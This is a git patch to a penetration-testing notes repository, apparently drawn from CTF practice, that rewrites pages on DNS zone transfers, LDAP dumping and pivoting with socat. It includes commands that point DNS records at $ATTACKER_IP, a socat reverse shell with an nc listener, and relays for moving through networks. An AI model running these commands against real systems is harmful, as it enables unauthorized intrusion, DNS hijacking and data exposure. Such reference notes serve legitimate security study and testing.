From 0f1b59e80fca3a25a0a0fc790decf3feefd9aa9f Mon Sep 17 00:00:00 2001 From: whackx Date: Wed, 9 Aug 2023 21:50:10 +0200 Subject: [PATCH] clean up and rewrite --- Enumeration/:w | 43 ++++++++++++++++++++++++ Enumeration/DNS.md | 14 ++++---- Enumeration/LDAP.md | 5 +-- Post Exploitation/Pivoting.md | 62 +++++++++++++++++++++-------------- 4 files changed, 90 insertions(+), 34 deletions(-) create mode 100644 Enumeration/:w diff --git a/Enumeration/:w b/Enumeration/:w new file mode 100644 index 0000000..4569f3f --- /dev/null +++ b/Enumeration/:w @@ -0,0 +1,43 @@ +# DNS + +## Subdomain Enumeration + +* Get all the info via +```sh +dig @$TARGET_DNS $DOMAIN axfr +drill @$TARGET_DNS $DOMAIN axfr +``` + +There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration. +A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters. + +## Join a Domain + +Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk +```sh +nsupdate +server +update delete +update add 1234 A $ATTACKER_IP +send +quit +``` +Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup. + +### Found Secrets for Keys + +Sometimes secrets can be found secret like a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain. +```sh +nsupdate -d -y :: +Creating key... +namefromtext +keycreate + +server +update add .. 86400 IN A $ATTACKER_IP +send +``` + +*Hint:* Copy the lines, every space counts as it has to be exactly like in the example + + diff --git a/Enumeration/DNS.md b/Enumeration/DNS.md index 2188e9d..2a2ac01 100644 --- a/Enumeration/DNS.md +++ b/Enumeration/DNS.md @@ -8,12 +8,12 @@ dig @$TARGET_DNS $DOMAIN axfr drill @$TARGET_DNS $DOMAIN axfr ``` -* [subrake](https://github.com/hash3liZer/Subrake.git) - +There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration. +A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters. ## Join a Domain -* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk +Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk ```sh nsupdate server @@ -22,11 +22,11 @@ update add 1234 A $ATTACKER_IP send quit ``` -* Check domain by querying the subdomain's A record via dig/drill/nslookup +Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup. ### Found Secrets for Keys -If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain. +Sometimes secrets can be found secret like a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain. ```sh nsupdate -d -y :: Creating key... @@ -34,10 +34,10 @@ namefromtext keycreate server -update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP +update add .. 86400 IN A $ATTACKER_IP send ``` -Copy the lines, every space counts as it has to be exactly like in the example +*Hint*: Copy the lines, every space counts as it has to be exactly like in the example diff --git a/Enumeration/LDAP.md b/Enumeration/LDAP.md index f9e7fd8..0bd2d94 100644 --- a/Enumeration/LDAP.md +++ b/Enumeration/LDAP.md @@ -2,6 +2,7 @@ ## Get Domain +Use the `ldapsearch` tool to receive information from an LDAP server. ```sh ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts ``` @@ -16,8 +17,8 @@ ldapsearch -H ldap://$TARGET_IP -x -b 'DC=,DC=' -D '\' -W > o ## Domain Dump -* If a set of credentials are known via +If a set of LDAP credentials is known dump the domain via ```sh ldapdomaindump $TARGET_IP -u '\' -p '' --no-json --no-grep ``` -* Take a look at the genreated HTML files +The result is a set of HTML files, take a look at them. diff --git a/Post Exploitation/Pivoting.md b/Post Exploitation/Pivoting.md index 6f71cf1..9c88016 100644 --- a/Post Exploitation/Pivoting.md +++ b/Post Exploitation/Pivoting.md @@ -92,37 +92,49 @@ echo y | &.\plink.exe -ssh -l -pw -R ::1 ### Socat +#### Local PortForwarding via Socat + +Open a local port (here 80) on a network interface +```sh +./socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80 +``` + +#### Open a reverse shell via Socat + * Reverse shell on target via - ```sh - ./socat tcp-l:8000 tcp::443 & - ``` - * Attacking bind shell - ```sh - sudo nc -lvnp 443 - ``` +```sh + ./socat tcp-l:8000 tcp::443 & +``` +* Attacking bind shell on attacker +```sh +sudo nc -lvnp 443 +``` -* Relay on jumpserver via - ```sh - ./socat tcp-l:33060,fork,reuseaddr tcp::3306 & - ``` +#### Jumpserver via Socat -* Quiet Port Forwarding - * On attacker - ```sh - socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & - ``` - * On relay server - ```sh - ./socat tcp::8001 tcp::,fork & - ``` - * Open `localhost:8000` +* Relay on a jumpserver via +```sh +./socat tcp-l:33060,fork,reuseaddr tcp::3306 & +``` -* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`. +#### Quiet Port Forwarding Through a Relay Server via Socat + +* On attacker +```sh +socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & +``` +* On relay server +```sh +./socat tcp::8001 tcp::,fork & +``` +__Notes__: Open `localhost:8000` on the attacker's browser or curl it afterwards. Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`. + +#### Forward Local Port via Socat * In need of a Download on target, expose a port on the attacker via relay - ```sh - socat tcp-l:80,fork tcp:$ATTACKER_IP:80 - ``` +```sh +socat tcp-l:80,fork tcp:$ATTACKER_IP:80 +``` ### Chisel